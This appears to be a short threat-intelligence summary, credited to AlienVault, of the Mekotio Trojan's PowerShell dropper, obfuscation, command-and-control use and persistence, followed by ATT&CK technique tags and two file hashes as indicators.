The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-control server for additional payloads, and ensures persistence through system modifications. The main payload consists of executable and script files utilized for malicious activities. Author: AlienVault
Related Tags:
T1064
Obfuscation
T1547.001
T1059.001
persistence
trojan
T1071
T1005
T1083
Associated Indicators:
0241E528277ED955CF8B4991D261D6E4DBA1F509
CC1582CA08498560A84FDF4E795FB63F